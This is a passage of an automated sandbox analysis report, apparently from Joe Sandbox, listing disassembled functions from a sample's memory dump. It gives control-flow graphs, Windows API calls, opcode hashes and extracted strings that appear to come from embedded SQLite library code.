                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B54197E1B0870382FA658B75E84CC7863A1EF45B90F648A36EA5D477A5DF3CF8468704
                                                                                                                                                                                                                              Function 00007FFB0C6736F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 116fileCOMMON
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1393 7ffb0c6736f0-7ffb0c67371b 1394 7ffb0c67371d-7ffb0c673732 1393->1394 1395 7ffb0c67376b-7ffb0c673798 1393->1395 1397 7ffb0c673754-7ffb0c673768 call 7ffb0c7bcf10 1394->1397 1398 7ffb0c673734 call 7ffb0c7bcf10 1394->1398 1396 7ffb0c6737a0-7ffb0c6737cb ReadFile 1395->1396 1401 7ffb0c6737d1-7ffb0c6737e1 1396->1401 1402 7ffb0c673858-7ffb0c67385a 1396->1402 1397->1395 1403 7ffb0c673739 1398->1403 1401->1402 1411 7ffb0c6737e3-7ffb0c6737f6 1401->1411 1405 7ffb0c67385c-7ffb0c673883 call 7ffb0c698730 1402->1405 1406 7ffb0c673888-7ffb0c673891 1402->1406 1407 7ffb0c67373b-7ffb0c673753 1403->1407 1405->1406 1406->1403 1410 7ffb0c673897-7ffb0c6738ac call 7ffb0c7bd5c0 1406->1410 1410->1407 1415 7ffb0c673830-7ffb0c673853 call 7ffb0c7b1a30 1411->1415 1416 7ffb0c6737f8-7ffb0c6737fe 1411->1416 1415->1407 1418 7ffb0c673800-7ffb0c673804 1416->1418 1419 7ffb0c673806-7ffb0c673809 1416->1419 1418->1419 1420 7ffb0c673812-7ffb0c67382b 1418->1420 1419->1420 1421 7ffb0c67380b-7ffb0c673810 1419->1421 1420->1396 1421->1415 1421->1420
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                                                                              • String ID: delayed %dms for lock/sharing conflict at line %d$winRead
                                                                                                                                                                                                                              • API String ID: 2738559852-1843600136
                                                                                                                                                                                                                              • Opcode ID: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                                              • Instruction ID: b8135238a066b979053b05ef8ea798036539ece9c515e8e7398b341d748eb70d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8d04d545caad1c6a2317e95ff4ca039504f2048aa6dee570b7be787d13645d2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 314106F2A1874282E7658F35E848DB9B7A1FF45B80F654636EA4D43768DF3CE4418340
                                                                                                                                                                                                                              Function 00007FFB0C7A9C70 Relevance: 3.3, APIs: 2, Instructions: 327COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 1989 7ffb0c7a9c70-7ffb0c7a9cb2 1990 7ffb0c7a9cb4-7ffb0c7a9cba 1989->1990 1991 7ffb0c7a9ce0-7ffb0c7a9ce2 1989->1991 1994 7ffb0c7a9cc5-7ffb0c7a9cc8 1990->1994 1995 7ffb0c7a9cbc-7ffb0c7a9cc0 1990->1995 1992 7ffb0c7a9ce4-7ffb0c7a9ce8 1991->1992 1993 7ffb0c7a9d61-7ffb0c7a9d8b call 7ffb0c722470 * 2 1991->1993 1996 7ffb0c7a9cea-7ffb0c7a9cf0 call 7ffb0c7a85f0 1992->1996 1997 7ffb0c7a9d4b-7ffb0c7a9d4f 1992->1997 2017 7ffb0c7a9e2c-7ffb0c7a9e4a 1993->2017 2018 7ffb0c7a9d91-7ffb0c7a9d99 1993->2018 2000 7ffb0c7a9cd3-7ffb0c7a9cd6 1994->2000 2001 7ffb0c7a9cca-7ffb0c7a9cd0 1994->2001 1999 7ffb0c7aa0d9-7ffb0c7aa0f5 call 7ffb0c7bbac0 1995->1999 2008 7ffb0c7a9cf5-7ffb0c7a9cfa 1996->2008 1997->1993 2003 7ffb0c7a9d51-7ffb0c7a9d5c call 7ffb0c7a6ac0 1997->2003 2000->1991 2001->2000 2003->1999 2011 7ffb0c7a9d3e-7ffb0c7a9d42 2008->2011 2012 7ffb0c7a9cfc-7ffb0c7a9d03 2008->2012 2011->1997 2014 7ffb0c7a9d44-7ffb0c7a9d46 2011->2014 2015 7ffb0c7a9d05-7ffb0c7a9d14 call 7ffb0c7a9420 2012->2015 2016 7ffb0c7a9d21-7ffb0c7a9d28 2012->2016 2014->1999 2029 7ffb0c7a9d16-7ffb0c7a9d1c call 7ffb0c7aa160 2015->2029 2030 7ffb0c7a9d2d-7ffb0c7a9d30 2015->2030 2016->1999 2019 7ffb0c7a9e56-7ffb0c7a9e5f 2017->2019 2020 7ffb0c7a9e4c-7ffb0c7a9e52 2017->2020 2018->2017 2022 7ffb0c7a9d9f-7ffb0c7a9da6 2018->2022 2023 7ffb0c7a9e60-7ffb0c7a9e6d 2019->2023 2020->2019 2025 7ffb0c7a9da8-7ffb0c7a9daf 2022->2025 2026 7ffb0c7a9db1-7ffb0c7a9db5 2022->2026 2027 7ffb0c7a9e7c 2023->2027 2028 7ffb0c7a9e6f-7ffb0c7a9e7a 2023->2028 2025->2026 2031 7ffb0c7a9db7-7ffb0c7a9dca call 7ffb0c7a9420 2025->2031 2026->2017 2026->2031 2033 7ffb0c7a9e7e-7ffb0c7a9e80 2027->2033 2028->2033 2029->2016 2030->2014 2035 7ffb0c7a9d32-7ffb0c7a9d39 2030->2035 2040 7ffb0c7a9ddd-7ffb0c7a9ddf 2031->2040 2041 7ffb0c7a9dcc-7ffb0c7a9dd3 2031->2041 2038 7ffb0c7a9ea7-7ffb0c7a9eaa 2033->2038 2039 7ffb0c7a9e82-7ffb0c7a9ea1 RaiseException 2033->2039 2035->1999 2042 7ffb0c7a9ebc 2038->2042 2043 7ffb0c7a9eac-7ffb0c7a9eaf 2038->2043 2039->2038 2044 7ffb0c7a9de1-7ffb0c7a9dff call 7ffb0c722470 call 7ffb0c7bce10 2040->2044 2045 7ffb0c7a9e20-7ffb0c7a9e23 2040->2045 2041->2040 2047 7ffb0c7a9ec0-7ffb0c7a9ec9 2042->2047 2043->2042 2046 7ffb0c7a9eb1-7ffb0c7a9eba 2043->2046 2068 7ffb0c7a9e14-7ffb0c7a9e1b 2044->2068 2069 7ffb0c7a9e01-7ffb0c7a9e0f call 7ffb0c7aa160 2044->2069 2045->2017 2049 7ffb0c7a9e25-7ffb0c7a9e27 2045->2049 2046->2047 2047->2023 2050 7ffb0c7a9ecb-7ffb0c7a9ed4 2047->2050 2051 7ffb0c7aa0d1 2049->2051 2052 7ffb0c7a9ed6-7ffb0c7a9ed9 2050->2052 2053 7ffb0c7a9f2e 2050->2053 2051->1999 2055 7ffb0c7a9ee3-7ffb0c7a9eeb 2052->2055 2056 7ffb0c7a9edb-7ffb0c7a9edd 2052->2056 2058 7ffb0c7a9f33-7ffb0c7a9f35 2053->2058 2060 7ffb0c7a9ef0-7ffb0c7a9ef4 2055->2060 2056->2055 2059 7ffb0c7a9fab 2056->2059 2062 7ffb0c7a9f37-7ffb0c7a9f47 2058->2062 2063 7ffb0c7a9fb0-7ffb0c7a9fb4 2058->2063 2059->2063 2064 7ffb0c7a9ef6-7ffb0c7a9f16 2060->2064 2065 7ffb0c7a9f5c 2060->2065 2070 7ffb0c7aa0c9 2062->2070 2066 7ffb0c7a9fb6-7ffb0c7a9fd5 2063->2066 2067 7ffb0c7a9fe9-7ffb0c7a9ffa 2063->2067 2084 7ffb0c7a9f18-7ffb0c7a9f1b 2064->2084 2085 7ffb0c7a9f4c-7ffb0c7a9f5a 2064->2085 2074 7ffb0c7a9f5e-7ffb0c7a9f76 2065->2074 2086 7ffb0c7aa085-7ffb0c7aa08f 2066->2086 2087 7ffb0c7a9fdb-7ffb0c7a9fe3 2066->2087 2071 7ffb0c7aa03a-7ffb0c7aa03e 2067->2071 2072 7ffb0c7a9ffc-7ffb0c7aa009 2067->2072 2068->2051 2069->2051 2070->2051 2075 7ffb0c7aa051-7ffb0c7aa05b 2071->2075 2076 7ffb0c7aa040-7ffb0c7aa047 2071->2076 2072->2071 2094 7ffb0c7aa00b-7ffb0c7aa034 RaiseException 2072->2094 2077 7ffb0c7a9fa5-7ffb0c7a9fa9 2074->2077 2078 7ffb0c7a9f78-7ffb0c7a9f9f 2074->2078 2082 7ffb0c7aa05d-7ffb0c7aa07d call 7ffb0c722470 call 7ffb0c7bce10 2075->2082 2083 7ffb0c7aa091-7ffb0c7aa095 2075->2083 2076->2075 2077->2058 2078->2077 2082->2083 2100 7ffb0c7aa07f-7ffb0c7aa083 2082->2100 2092 7ffb0c7aa0c4 2083->2092 2093 7ffb0c7aa097-7ffb0c7aa0bd 2083->2093 2084->2070 2091 7ffb0c7a9f21-7ffb0c7a9f28 2084->2091 2085->2074 2086->2070 2087->2067 2091->2060 2096 7ffb0c7a9f2a 2091->2096 2092->2070 2093->2092 2094->2071 2096->2053 2100->2070
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                                              • Instruction ID: d9bd2c3c26128c4a263be6e24d976f8cb6435bd671f3ef38f7a93257da68872a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01bfdea8fde9a3b29e8790184ed6a843e84f17ebbdda68c3349c733af6744fc2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3D1A2F2A0864686EB548F3AD448B7A33A5FF84B98F045075DA4E87795EF3DE894C700
                                                                                                                                                                                                                              Function 00007FFB0C7C996C Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 2101 7ffb0c7c996c-7ffb0c7c996f 2102 7ffb0c7c99a7 2101->2102 2103 7ffb0c7c9971-7ffb0c7c998a RtlFreeHeap 2101->2103 2104 7ffb0c7c99a2-7ffb0c7c99a6 2103->2104 2105 7ffb0c7c998c-7ffb0c7c99a0 GetLastError call 7ffb0c7c9df4 call 7ffb0c7c9ec8 2103->2105 2104->2102 2105->2104
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • RtlFreeHeap.NTDLL(?,?,?,00007FFB0C7D22A2,?,?,?,00007FFB0C7D22DF,?,?,00000000,00007FFB0C7CFE4D,?,?,?,00007FFB0C7CFD7F), ref: 00007FFB0C7C9982
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FFB0C7D22A2,?,?,?,00007FFB0C7D22DF,?,?,00000000,00007FFB0C7CFE4D,?,?,?,00007FFB0C7CFD7F), ref: 00007FFB0C7C998C
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 485612231-0
                                                                                                                                                                                                                              • Opcode ID: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                                              • Instruction ID: 74b479fda9b192dd45c5c7c70ae4fecd3278cc2488e4cd0d789b455ea27b6874
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1e5e7c948760cf301929a07a706e348abcbcec31b0f3dce1069e93b05921774f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82E08CD1F0A24342FF58ABB2E8CE87816A49F98B81F040438CA4D46263EF3DA8814214

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FFB0C734770 Relevance: 30.0, Strings: 23, Instructions: 1217COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: UNIQUE$BINARY$CREATE%s INDEX %.*s$FIRST$INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);$LAST$cannot create a TEMP index on non-TEMP table "%s"$conflicting ON CONFLICT clauses specified$expressions prohibited in PRIMARY KEY and UNIQUE constraints$index$index %s already exists$invalid rootpage$name='%q' AND type='index'$sqlite_$sqlite_autoindex_%s_%d$sqlite_master$sqlite_temp_master$table %s may not be indexed$there is already a table named %s$too many columns in %s$unsupported use of NULLS %s$views may not be indexed$virtual tables may not be indexed
                                                                                                                                                                                                                              • API String ID: 0-2483461966
                                                                                                                                                                                                                              • Opcode ID: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                                                              • Instruction ID: 7929c22599b5c39013c27d71f1df39c474e72f1d7f41f648ff2f650882d174c4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a8a71a941c890f90e2ae85053de89cb1297b1c782d384ea9fdf8966f3a450f00
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93C2EDE2B09B9686EBA48B36D448AB93BA5FF48B84F554136DE8D47795DF3CE440C300
                                                                                                                                                                                                                              Function 00007FFB0C709AB0 Relevance: 25.1, Strings: 19, Instructions: 1311COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s: "%s" - should this be a string literal in single-quotes?$%s: %s$%s: %s.%s$%s: %s.%s.%s$H$N$ROWID$ambiguous column name$coalesce$double-quoted string literal: "%w"$excluded$main$misuse of aliased aggregate %s$misuse of aliased window function %s$new$no such column$old$row value misused$z
                                                                                                                                                                                                                              • API String ID: 0-3187542301
                                                                                                                                                                                                                              • Opcode ID: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                                              • Instruction ID: 9a17a3c368606281aec7ba662258190a5151e15deacb549ef22a4a4e040cb3de
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d22989c4954f2225df599e1ffbcc01da95558679591f43aa7e7e0fd9f09dd032
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C1C2B0E2A08782C2EBA48B26D048A7D7BA1FF95BA0F658135DE8D47795DF3CE450D700
                                                                                                                                                                                                                              Function 00007FFB0C67FBB0 Relevance: 24.1, Strings: 19, Instructions: 334COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                              • API String ID: 0-767664412
                                                                                                                                                                                                                              • Opcode ID: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                                              • Instruction ID: 1b43e079a89e4f1cdf42b7aaf9221a4d917fe2464db42b09f4e26fdc6e42c6b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d26338cd79e127a6da74e814f339bfb35dbc7715f05c13480861dc1c9c7972f5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFB137D37305984BD7A98A3EF822F9D1B84D3A5348F485239F645CFFC6E92AE5018702
                                                                                                                                                                                                                              Function 00007FFB0C6C69D0 Relevance: 23.8, Strings: 18, Instructions: 1323COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: , ?$,%s(?)$4$PRAGMA %Q.page_size$compress$content$error parsing prefix parameter: %s$languageid$matchinfo$missing %s parameter in fts4 constructor$no such column: %s$notindexed$order$prefix$simple$tokenize$uncompress$unrecognized parameter: %s
                                                                                                                                                                                                                              • API String ID: 0-404594414
                                                                                                                                                                                                                              • Opcode ID: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                                                              • Instruction ID: f412a189ebaaaa05ec7abd04288cd9e673c43b98e74236d0a0f75c183f59e69f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f80f9d41d871cb6df72d7b536e3108c8bbb9dd35af6d5dd8f3c3b51340b2c416
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1BD27CE2A09B4685EB668F75E888A7927A0FF44BD4F140136EE5E477A6CF3CE445C700
                                                                                                                                                                                                                              Function 00007FFB0C680010 Relevance: 17.7, Strings: 14, Instructions: 201COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: .$:$:$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff$gfff
                                                                                                                                                                                                                              • API String ID: 0-3693326857
                                                                                                                                                                                                                              • Opcode ID: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                                              • Instruction ID: a01bd580aaf8d2815d6cba310c163c930f6b561c6b5b0107b746ba1972079ac5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 84064367d166328c73bafa2deacc8719837e885c81f3bc5b75f58f6c58ee12b6
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E9614BD3B205984BE759C63EFC22BAD1BD5A790344F084235EE45DFBC6EA29E6018742
                                                                                                                                                                                                                              Function 00007FFB0C7657F0 Relevance: 16.8, Strings: 13, Instructions: 503COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1579152401.00007FFB0C671000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB0C670000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579081678.00007FFB0C670000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579337916.00007FFB0C80D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579354652.00007FFB0C812000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579371659.00007FFB0C813000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1579392732.00007FFB0C816000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ffb0c670000_nNnzvybxiy.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: %s mode not allowed: %s$/$/$access$cach$cach$cache$file$invalid uri authority: %.*s$localhos$mode$no such %s mode: %s$no such vfs: %s
                                                                                                                                                                                                                              • API String ID: 0-3326250075
                                                                                                                                                                                                                              • Opcode ID: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                                                                                              • Instruction ID: c114fb941ba1bad968d248537b2d0b300fd269919b4cc32c7c7b87338372f59c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72810fc45149092ed43ee729b48025bb36086465848980857dd08bbe2587332e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7422BFF2E0C68349FBB58B35D48CB796B91AF45BA4F084236CA5E066D5DF3CE445A300
